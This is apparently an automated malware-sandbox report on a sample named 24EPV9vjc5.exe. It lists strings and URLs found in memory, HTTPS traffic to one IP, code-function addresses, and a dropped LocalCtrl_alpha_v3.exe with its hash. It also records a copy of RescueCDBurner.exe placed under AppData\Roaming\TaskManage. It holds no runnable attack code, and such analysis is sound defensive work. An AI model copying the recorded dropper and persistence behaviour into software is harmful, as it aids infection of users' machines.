Source: RescueCDBurner.exe, 00000003.00000000.1339692384.0000000000854000.00000002.00000001.01000000.00000007.sdmp, RescueCDBurner.exe, 00000003.00000002.1356442812.0000000000854000.00000002.00000001.01000000.00000007.sdmp, RescueCDBurner.exe, 00000004.00000000.1355407575.0000000000934000.00000002.00000001.01000000.00000010.sdmp, RescueCDBurner.exe, 00000004.00000002.1425578694.0000000000934000.00000002.00000001.01000000.00000010.sdmp	String found in binary or memory: https://downloads.reneelab.com/passnow/passnow_cnhttps://downloads.reneelab.com.cn/passnow/passnow_x
Source: LocalCtrl_alpha_v3.exe, 00000009.00000003.2288219961.0000000002EE5000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://edgeassetservice.azureedge.net
Source: LocalCtrl_alpha_v3.exe, 00000009.00000003.2300620973.0000000002EE5000.00000004.00000001.00020000.00000000.sdmp, LocalCtrl_alpha_v3.exe, 00000009.00000003.2288219961.0000000002EE5000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_action_center_maximal_light.png/1.2.1/as
Source: LocalCtrl_alpha_v3.exe, 00000009.00000003.2300620973.0000000002EE5000.00000004.00000001.00020000.00000000.sdmp, LocalCtrl_alpha_v3.exe, 00000009.00000003.2288219961.0000000002EE5000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://ent-api.msn.com/%22
Source: LocalCtrl_alpha_v3.exe, 00000009.00000003.2300257481.00000000080BC000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AA1cLbwq?w=168&h=168&q=60&m=6&f=jpg&u=t
Source: LocalCtrl_alpha_v3.exe, 00000009.00000003.2299666497.00000000080BC000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AA1cLbwq?w=168&h=168&q=60&m=6&f=jpg&u=td9
Source: LocalCtrl_alpha_v3.exe, 00000009.00000003.2288301207.00000000080BC000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://msn.com
Source: LocalCtrl_alpha_v3.exe, 00000009.00000003.2300257481.00000000080BC000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://ntp.msn.
Source: LocalCtrl_alpha_v3.exe, 00000009.00000003.2300257481.00000000080BC000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://ntp.msn.com
Source: LocalCtrl_alpha_v3.exe, 00000009.00000003.2300620973.0000000002EE5000.00000004.00000001.00020000.00000000.sdmp, LocalCtrl_alpha_v3.exe, 00000009.00000003.2288219961.0000000002EE5000.00000004.00000001.00020000.00000000.sdmp, LocalCtrl_alpha_v3.exe, 00000009.00000003.2288301207.00000000080BC000.00000004.00000001.00020000.00000000.sdmp, LocalCtrl_alpha_v3.exe, 00000009.00000003.2300257481.00000000080BC000.00000004.00000001.00020000.00000000.sdmp, LocalCtrl_alpha_v3.exe, 00000009.00000003.2438767796.0000000002E7E000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://ntp.msn.com/
Source: LocalCtrl_alpha_v3.exe, 00000009.00000003.2300620973.0000000002EE5000.00000004.00000001.00020000.00000000.sdmp, LocalCtrl_alpha_v3.exe, 00000009.00000003.2288219961.0000000002EE5000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://ntp.msn.com/tt
Source: LocalCtrl_alpha_v3.exe, 00000009.00000003.2300257481.00000000080BC000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://ntp.msn.comAccess-Control-Expose-Headers:
Source: LocalCtrl_alpha_v3.exe, 00000009.00000003.2300620973.0000000002EE5000.00000004.00000001.00020000.00000000.sdmp, LocalCtrl_alpha_v3.exe, 00000009.00000003.2288219961.0000000002EE5000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://ntp.msn.comreport-to:
Source: LocalCtrl_alpha_v3.exe, 00000009.00000003.2288301207.00000000080BC000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.clarity.ms
Source: RescueCDBurner.exe, 00000003.00000002.1370083717.0000000009AB2000.00000004.00000020.00020000.00000000.sdmp, RescueCDBurner.exe, 00000004.00000002.1430634708.0000000009D9B000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000005.00000002.1707439030.0000000005033000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.digicert.com/CPS0
Source: LocalCtrl_alpha_v3.exe, 00000009.00000003.2288219961.0000000002EE5000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.googleapis.com
Source: RescueCDBurner.exe, 00000003.00000000.1339692384.0000000000854000.00000002.00000001.01000000.00000007.sdmp, RescueCDBurner.exe, 00000003.00000002.1356442812.0000000000854000.00000002.00000001.01000000.00000007.sdmp, RescueCDBurner.exe, 00000004.00000000.1355407575.0000000000934000.00000002.00000001.01000000.00000010.sdmp, RescueCDBurner.exe, 00000004.00000002.1425578694.0000000000934000.00000002.00000001.01000000.00000010.sdmp	String found in binary or memory: https://www.reneelab.com
Source: RescueCDBurner.exe, 00000003.00000000.1339692384.0000000000854000.00000002.00000001.01000000.00000007.sdmp, RescueCDBurner.exe, 00000003.00000002.1356442812.0000000000854000.00000002.00000001.01000000.00000007.sdmp, RescueCDBurner.exe, 00000004.00000000.1355407575.0000000000934000.00000002.00000001.01000000.00000010.sdmp, RescueCDBurner.exe, 00000004.00000002.1425578694.0000000000934000.00000002.00000001.01000000.00000010.sdmp	String found in binary or memory: https://www.reneelab.comwww.reneelab.comhttp://https://0

Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50054
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50053
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50056
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50055
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50058
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50057
Source: unknown	Network traffic detected: HTTP traffic on port 50059 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50094 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50059
Source: unknown	Network traffic detected: HTTP traffic on port 50022 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50071 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50068 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50102 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49977
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49976
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49975
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50106
Source: unknown	Network traffic detected: HTTP traffic on port 49675 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50105
Source: unknown	Network traffic detected: HTTP traffic on port 50010 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49975 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50018 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50067
Source: unknown	Network traffic detected: HTTP traffic on port 50091 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50100
Source: unknown	Network traffic detected: HTTP traffic on port 50056 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50102
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50068
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50101
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50104
Source: unknown	Network traffic detected: HTTP traffic on port 50053 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50071
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50073
Source: unknown	Network traffic detected: HTTP traffic on port 50088 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49674 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50057 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50096 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50099 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50073 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50028 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50031 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50100 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50037 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50012 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49677 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50020 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50086
Source: unknown	Network traffic detected: HTTP traffic on port 50093 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50054 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50089
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50088
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50002
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50090
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50092
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50091
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50094
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50093
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50096
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50095
Source: unknown	Network traffic detected: HTTP traffic on port 50105 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50018
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50017
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50019
Source: unknown	Network traffic detected: HTTP traffic on port 50017 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50010
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50098
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50097
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50012
Source: unknown	Network traffic detected: HTTP traffic on port 50055 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50011
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50099
Source: unknown	Network traffic detected: HTTP traffic on port 50090 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50016
Source: unknown	Network traffic detected: HTTP traffic on port 50106 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49977 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50028
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50021
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50020
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50022
Source: unknown	Network traffic detected: HTTP traffic on port 50095 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50098 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50021 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50067 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50086 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49976 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50011 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50031
Source: unknown	Network traffic detected: HTTP traffic on port 50019 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50092 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50037
Source: unknown	Network traffic detected: HTTP traffic on port 50104 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50089 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50016 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50058 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50097 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50002 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50101 -> 443

Source: unknown	HTTPS traffic detected: 172.67.174.91:443 -> 192.168.2.10:49975 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.174.91:443 -> 192.168.2.10:49976 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.174.91:443 -> 192.168.2.10:49977 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.174.91:443 -> 192.168.2.10:50086 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.174.91:443 -> 192.168.2.10:50088 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.174.91:443 -> 192.168.2.10:50089 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.174.91:443 -> 192.168.2.10:50090 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.174.91:443 -> 192.168.2.10:50091 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.174.91:443 -> 192.168.2.10:50092 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.174.91:443 -> 192.168.2.10:50093 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.174.91:443 -> 192.168.2.10:50094 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.174.91:443 -> 192.168.2.10:50095 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.174.91:443 -> 192.168.2.10:50096 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.174.91:443 -> 192.168.2.10:50097 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.174.91:443 -> 192.168.2.10:50098 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.174.91:443 -> 192.168.2.10:50099 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.174.91:443 -> 192.168.2.10:50100 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.174.91:443 -> 192.168.2.10:50101 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.174.91:443 -> 192.168.2.10:50102 version: TLS 1.2

Source: C:\Windows\Temp\{8EC8EC6B-64C2-4C91-BDF6-2F209A95D5A8}\.cr\24EPV9vjc5.exe

Code function: 2_2_5BB43C8C _CreateDesktop_@24,lstrlenW,GlobalAlloc,lstrlenW,GlobalAlloc,lstrlenW,GlobalAlloc,lstrlenW,GlobalAlloc,GlobalAlloc,WideCharToMultiByte,WideCharToMultiByte,WideCharToMultiByte,WideCharToMultiByte,strcpy,strcpy,CreateDesktopA,lstrlenA,MultiByteToWideChar,GlobalFree,lstrlenA,MultiByteToWideChar,GlobalFree,lstrlenA,MultiByteToWideChar,GlobalFree,lstrlenA,MultiByteToWideChar,GlobalFree,GlobalFree,

2_2_5BB43C8C

Source: C:\Windows\Temp\{8EC8EC6B-64C2-4C91-BDF6-2F209A95D5A8}\.cr\24EPV9vjc5.exe

Code function: 2_2_5BB3EEEA _CreateProcessAsUser_@44,SetLastError,newMultiByteFromWideChar,newMultiByteFromWideChar,newMultiByteFromWideChar,memset,newMultiByteFromWideChar,CreateProcessAsUserA,GlobalFree,GlobalFree,GlobalFree,GlobalFree,

2_2_5BB3EEEA

Source: C:\Users\user\Desktop\24EPV9vjc5.exe

File deleted: C:\Windows\Temp\{8EC8EC6B-64C2-4C91-BDF6-2F209A95D5A8}\.cr\24EPV9vjc5.exe

Jump to behavior

Source: C:\Users\user\Desktop\24EPV9vjc5.exe	Code function: 0_2_000F001D	0_2_000F001D
Source: C:\Users\user\Desktop\24EPV9vjc5.exe	Code function: 0_2_000E41EA	0_2_000E41EA
Source: C:\Users\user\Desktop\24EPV9vjc5.exe	Code function: 0_2_000C62AA	0_2_000C62AA
Source: C:\Users\user\Desktop\24EPV9vjc5.exe	Code function: 0_2_000EC332	0_2_000EC332
Source: C:\Users\user\Desktop\24EPV9vjc5.exe	Code function: 0_2_000F03D5	0_2_000F03D5
Source: C:\Users\user\Desktop\24EPV9vjc5.exe	Code function: 0_2_000FA560	0_2_000FA560
Source: C:\Users\user\Desktop\24EPV9vjc5.exe	Code function: 0_2_000F07AA	0_2_000F07AA
Source: C:\Users\user\Desktop\24EPV9vjc5.exe	Code function: 0_2_000CA8F1	0_2_000CA8F1
Source: C:\Users\user\Desktop\24EPV9vjc5.exe	Code function: 0_2_000FAA0E	0_2_000FAA0E
Source: C:\Users\user\Desktop\24EPV9vjc5.exe	Code function: 0_2_000F0B6F	0_2_000F0B6F
Source: C:\Users\user\Desktop\24EPV9vjc5.exe	Code function: 0_2_000EFB89	0_2_000EFB89
Source: C:\Users\user\Desktop\24EPV9vjc5.exe	Code function: 0_2_000F2C18	0_2_000F2C18
Source: C:\Users\user\Desktop\24EPV9vjc5.exe	Code function: 0_2_000F2E47	0_2_000F2E47
Source: C:\Users\user\Desktop\24EPV9vjc5.exe	Code function: 0_2_000FEE7C	0_2_000FEE7C
Source: C:\Windows\Temp\{8EC8EC6B-64C2-4C91-BDF6-2F209A95D5A8}\.cr\24EPV9vjc5.exe	Code function: 2_2_0068001D	2_2_0068001D
Source: C:\Windows\Temp\{8EC8EC6B-64C2-4C91-BDF6-2F209A95D5A8}\.cr\24EPV9vjc5.exe	Code function: 2_2_006741EA	2_2_006741EA
Source: C:\Windows\Temp\{8EC8EC6B-64C2-4C91-BDF6-2F209A95D5A8}\.cr\24EPV9vjc5.exe	Code function: 2_2_006562AA	2_2_006562AA
Source: C:\Windows\Temp\{8EC8EC6B-64C2-4C91-BDF6-2F209A95D5A8}\.cr\24EPV9vjc5.exe	Code function: 2_2_0067C332	2_2_0067C332
Source: C:\Windows\Temp\{8EC8EC6B-64C2-4C91-BDF6-2F209A95D5A8}\.cr\24EPV9vjc5.exe	Code function: 2_2_006803D5	2_2_006803D5
Source: C:\Windows\Temp\{8EC8EC6B-64C2-4C91-BDF6-2F209A95D5A8}\.cr\24EPV9vjc5.exe	Code function: 2_2_0068A560	2_2_0068A560
Source: C:\Windows\Temp\{8EC8EC6B-64C2-4C91-BDF6-2F209A95D5A8}\.cr\24EPV9vjc5.exe	Code function: 2_2_006807AA	2_2_006807AA
Source: C:\Windows\Temp\{8EC8EC6B-64C2-4C91-BDF6-2F209A95D5A8}\.cr\24EPV9vjc5.exe	Code function: 2_2_0065A8F1	2_2_0065A8F1
Source: C:\Windows\Temp\{8EC8EC6B-64C2-4C91-BDF6-2F209A95D5A8}\.cr\24EPV9vjc5.exe	Code function: 2_2_0068AA0E	2_2_0068AA0E
Source: C:\Windows\Temp\{8EC8EC6B-64C2-4C91-BDF6-2F209A95D5A8}\.cr\24EPV9vjc5.exe	Code function: 2_2_00680B6F	2_2_00680B6F
Source: C:\Windows\Temp\{8EC8EC6B-64C2-4C91-BDF6-2F209A95D5A8}\.cr\24EPV9vjc5.exe	Code function: 2_2_0067FB89	2_2_0067FB89
Source: C:\Windows\Temp\{8EC8EC6B-64C2-4C91-BDF6-2F209A95D5A8}\.cr\24EPV9vjc5.exe	Code function: 2_2_00682C18	2_2_00682C18
Source: C:\Windows\Temp\{8EC8EC6B-64C2-4C91-BDF6-2F209A95D5A8}\.cr\24EPV9vjc5.exe	Code function: 2_2_0068EE7C	2_2_0068EE7C
Source: C:\Windows\Temp\{8EC8EC6B-64C2-4C91-BDF6-2F209A95D5A8}\.cr\24EPV9vjc5.exe	Code function: 2_2_00682E47	2_2_00682E47
Source: C:\Windows\Temp\{8EC8EC6B-64C2-4C91-BDF6-2F209A95D5A8}\.cr\24EPV9vjc5.exe	Code function: 2_2_5BB31FA0	2_2_5BB31FA0
Source: C:\Windows\Temp\{8EC8EC6B-64C2-4C91-BDF6-2F209A95D5A8}\.cr\24EPV9vjc5.exe	Code function: 2_2_5BB3FF2C	2_2_5BB3FF2C
Source: C:\Windows\Temp\{016BF9DE-C6BA-4390-A69A-2DC08D9C2A70}\.ba\RescueCDBurner.exe	Code function: 3_2_6C4DECCD	3_2_6C4DECCD
Source: C:\Windows\Temp\{016BF9DE-C6BA-4390-A69A-2DC08D9C2A70}\.ba\RescueCDBurner.exe	Code function: 3_2_6C4A9D65	3_2_6C4A9D65
Source: C:\Windows\Temp\{016BF9DE-C6BA-4390-A69A-2DC08D9C2A70}\.ba\RescueCDBurner.exe	Code function: 3_2_6C4B457E	3_2_6C4B457E
Source: C:\Windows\Temp\{016BF9DE-C6BA-4390-A69A-2DC08D9C2A70}\.ba\RescueCDBurner.exe	Code function: 3_2_6C4A3DD0	3_2_6C4A3DD0
Source: C:\Windows\Temp\{016BF9DE-C6BA-4390-A69A-2DC08D9C2A70}\.ba\RescueCDBurner.exe	Code function: 3_2_6C4A867F	3_2_6C4A867F
Source: C:\Windows\Temp\{016BF9DE-C6BA-4390-A69A-2DC08D9C2A70}\.ba\RescueCDBurner.exe	Code function: 3_2_6C4A8F83	3_2_6C4A8F83
Source: C:\Windows\Temp\{016BF9DE-C6BA-4390-A69A-2DC08D9C2A70}\.ba\RescueCDBurner.exe	Code function: 3_2_6C4A97A0	3_2_6C4A97A0
Source: C:\Windows\Temp\{016BF9DE-C6BA-4390-A69A-2DC08D9C2A70}\.ba\RescueCDBurner.exe	Code function: 3_2_6C4A7093	3_2_6C4A7093
Source: C:\Windows\Temp\{016BF9DE-C6BA-4390-A69A-2DC08D9C2A70}\.ba\RescueCDBurner.exe	Code function: 3_2_6C4C0919	3_2_6C4C0919
Source: C:\Windows\Temp\{016BF9DE-C6BA-4390-A69A-2DC08D9C2A70}\.ba\RescueCDBurner.exe	Code function: 3_2_6C4B911E	3_2_6C4B911E
Source: C:\Windows\Temp\{016BF9DE-C6BA-4390-A69A-2DC08D9C2A70}\.ba\RescueCDBurner.exe	Code function: 3_2_6C4921F0	3_2_6C4921F0
Source: C:\Windows\Temp\{016BF9DE-C6BA-4390-A69A-2DC08D9C2A70}\.ba\RescueCDBurner.exe	Code function: 3_2_6C537A5A	3_2_6C537A5A
Source: C:\Windows\Temp\{016BF9DE-C6BA-4390-A69A-2DC08D9C2A70}\.ba\RescueCDBurner.exe	Code function: 3_2_6C4A7270	3_2_6C4A7270
Source: C:\Windows\Temp\{016BF9DE-C6BA-4390-A69A-2DC08D9C2A70}\.ba\RescueCDBurner.exe	Code function: 3_2_6C4A3A1C	3_2_6C4A3A1C
Source: C:\Windows\Temp\{016BF9DE-C6BA-4390-A69A-2DC08D9C2A70}\.ba\RescueCDBurner.exe	Code function: 3_2_6C4AA2A7	3_2_6C4AA2A7
Source: C:\Windows\Temp\{016BF9DE-C6BA-4390-A69A-2DC08D9C2A70}\.ba\RescueCDBurner.exe	Code function: 3_2_6C4EA3DD	3_2_6C4EA3DD
Source: C:\Windows\Temp\{016BF9DE-C6BA-4390-A69A-2DC08D9C2A70}\.ba\RescueCDBurner.exe	Code function: 3_2_6C4A43A6	3_2_6C4A43A6
Source: C:\Users\user\AppData\Roaming\TaskManage\RescueCDBurner.exe	Code function: 4_2_6B2C6B28	4_2_6B2C6B28
Source: C:\Users\user\AppData\Roaming\TaskManage\RescueCDBurner.exe	Code function: 4_2_6B2E0919	4_2_6B2E0919
Source: C:\Users\user\AppData\Roaming\TaskManage\RescueCDBurner.exe	Code function: 4_2_6B34083D	4_2_6B34083D
Source: C:\Users\user\AppData\Roaming\TaskManage\RescueCDBurner.exe	Code function: 4_2_6B2C8F83	4_2_6B2C8F83
Source: C:\Users\user\AppData\Roaming\TaskManage\RescueCDBurner.exe	Code function: 4_2_6B2FECCD	4_2_6B2FECCD
Source: C:\Users\user\AppData\Roaming\TaskManage\RescueCDBurner.exe	Code function: 4_2_6B2C43A6	4_2_6B2C43A6
Source: C:\Users\user\AppData\Roaming\TaskManage\RescueCDBurner.exe	Code function: 4_2_6B2C63C9	4_2_6B2C63C9
Source: C:\Users\user\AppData\Roaming\TaskManage\RescueCDBurner.exe	Code function: 4_2_6B30A3DD	4_2_6B30A3DD
Source: C:\Users\user\AppData\Roaming\TaskManage\RescueCDBurner.exe	Code function: 4_2_6B2CA2A7	4_2_6B2CA2A7
Source: C:\Users\user\AppData\Roaming\TaskManage\RescueCDBurner.exe	Code function: 4_2_6B3242FB	4_2_6B3242FB
Source: C:\Users\user\AppData\Roaming\TaskManage\RescueCDBurner.exe	Code function: 4_2_6B348140	4_2_6B348140
Source: C:\Users\user\AppData\Roaming\TaskManage\RescueCDBurner.exe	Code function: 4_2_6B2B21F0	4_2_6B2B21F0
Source: C:\Users\user\AppData\Roaming\TaskManage\RescueCDBurner.exe	Code function: 4_2_6B2C6018	4_2_6B2C6018
Source: C:\Users\user\AppData\Roaming\TaskManage\RescueCDBurner.exe	Code function: 4_2_6B30E0BD	4_2_6B30E0BD
Source: C:\Users\user\AppData\Roaming\TaskManage\RescueCDBurner.exe	Code function: 4_2_6B35672F	4_2_6B35672F
Source: C:\Users\user\AppData\Roaming\TaskManage\RescueCDBurner.exe	Code function: 4_2_6B32E765	4_2_6B32E765
Source: C:\Users\user\AppData\Roaming\TaskManage\RescueCDBurner.exe	Code function: 4_2_6B2C867F	4_2_6B2C867F
Source: C:\Users\user\AppData\Roaming\TaskManage\RescueCDBurner.exe	Code function: 4_2_6B2D457E	4_2_6B2D457E
Source: C:\Users\user\AppData\Roaming\TaskManage\RescueCDBurner.exe	Code function: 4_2_6B32245B	4_2_6B32245B
Source: C:\Users\user\AppData\Roaming\TaskManage\RescueCDBurner.exe	Code function: 4_2_6B30DBC0	4_2_6B30DBC0
Source: C:\Users\user\AppData\Roaming\TaskManage\RescueCDBurner.exe	Code function: 4_2_6B2C3A1C	4_2_6B2C3A1C
Source: C:\Users\user\AppData\Roaming\TaskManage\RescueCDBurner.exe	Code function: 4_2_6B351A00	4_2_6B351A00
Source: C:\Users\user\AppData\Roaming\TaskManage\RescueCDBurner.exe	Code function: 4_2_6B357A5A	4_2_6B357A5A
Source: C:\Users\user\AppData\Roaming\TaskManage\RescueCDBurner.exe	Code function: 4_2_6B329945	4_2_6B329945
Source: C:\Users\user\AppData\Roaming\TaskManage\RescueCDBurner.exe	Code function: 4_2_6B32F82E	4_2_6B32F82E
Source: C:\Users\user\AppData\Roaming\TaskManage\RescueCDBurner.exe	Code function: 4_2_6B343888	4_2_6B343888
Source: C:\Users\user\AppData\Roaming\TaskManage\RescueCDBurner.exe	Code function: 4_2_6B2C9D65	4_2_6B2C9D65
Source: C:\Users\user\AppData\Roaming\TaskManage\RescueCDBurner.exe	Code function: 4_2_6B2C3DD0	4_2_6B2C3DD0
Source: C:\Users\user\AppData\Roaming\TaskManage\RescueCDBurner.exe	Code function: 4_2_6B2C5C2C	4_2_6B2C5C2C
Source: C:\Users\user\AppData\Roaming\TaskManage\RescueCDBurner.exe	Code function: 4_2_6B2C5C30	4_2_6B2C5C30
Source: C:\Users\user\AppData\Roaming\TaskManage\RescueCDBurner.exe	Code function: 4_2_6B341C17	4_2_6B341C17
Source: C:\Users\user\AppData\Roaming\TaskManage\RescueCDBurner.exe	Code function: 4_2_6B323332	4_2_6B323332
Source: C:\Users\user\AppData\Roaming\TaskManage\RescueCDBurner.exe	Code function: 4_2_6B35923E	4_2_6B35923E
Source: C:\Users\user\AppData\Roaming\TaskManage\RescueCDBurner.exe	Code function: 4_2_6B2C7270	4_2_6B2C7270
Source: C:\Users\user\AppData\Roaming\TaskManage\RescueCDBurner.exe	Code function: 4_2_6B3252E5	4_2_6B3252E5
Source: C:\Users\user\AppData\Roaming\TaskManage\RescueCDBurner.exe	Code function: 4_2_6B2D911E	4_2_6B2D911E
Source: C:\Users\user\AppData\Roaming\TaskManage\RescueCDBurner.exe	Code function: 4_2_6B2C71A3	4_2_6B2C71A3
Source: C:\Users\user\AppData\Roaming\TaskManage\RescueCDBurner.exe	Code function: 4_2_6B2C7093	4_2_6B2C7093
Source: C:\Users\user\AppData\Roaming\TaskManage\RescueCDBurner.exe	Code function: 4_2_6B2C97A0	4_2_6B2C97A0
Source: C:\Users\user\AppData\Roaming\TaskManage\RescueCDBurner.exe	Code function: 4_2_6B32B79B	4_2_6B32B79B
Source: C:\Users\user\AppData\Roaming\TaskManage\RescueCDBurner.exe	Code function: 4_2_6B34D674	4_2_6B34D674
Source: C:\Users\user\AppData\Roaming\TaskManage\RescueCDBurner.exe	Code function: 4_2_6B359659	4_2_6B359659
Source: C:\Users\user\AppData\Roaming\TaskManage\RescueCDBurner.exe	Code function: 4_2_6B30D687	4_2_6B30D687
Source: C:\Users\user\AppData\Roaming\TaskManage\RescueCDBurner.exe	Code function: 4_2_6B32D45A	4_2_6B32D45A
Source: C:\Users\user\AppData\Roaming\TaskManage\RescueCDBurner.exe	Code function: 4_2_6B39E822	4_2_6B39E822
Source: C:\Users\user\AppData\Roaming\TaskManage\RescueCDBurner.exe	Code function: 4_2_6B39F862	4_2_6B39F862
Source: C:\Users\user\AppData\Roaming\TaskManage\RescueCDBurner.exe	Code function: 4_2_6B39EE04	4_2_6B39EE04
Source: C:\Users\user\AppData\Roaming\TaskManage\RescueCDBurner.exe	Code function: 4_2_6B39E15E	4_2_6B39E15E

Source: Joe Sandbox View

Dropped File: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exe B22BF1210B5FD173A210EBFA9092390AA0513C41E1914CBE161EB547F049EF91

Source: C:\Windows\Temp\{8EC8EC6B-64C2-4C91-BDF6-2F209A95D5A8}\.cr\24EPV9vjc5.exe	Code function: String function: 00653821 appears 498 times
Source: C:\Windows\Temp\{8EC8EC6B-64C2-4C91-BDF6-2F209A95D5A8}\.cr\24EPV9vjc5.exe	Code function: String function: 006932F3 appears 84 times
Source: C:\Windows\Temp\{8EC8EC6B-64C2-4C91-BDF6-2F209A95D5A8}\.cr\24EPV9vjc5.exe	Code function: String function: 00651F13 appears 53 times
Source: C:\Windows\Temp\{8EC8EC6B-64C2-4C91-BDF6-2F209A95D5A8}\.cr\24EPV9vjc5.exe	Code function: String function: 00690726 appears 34 times
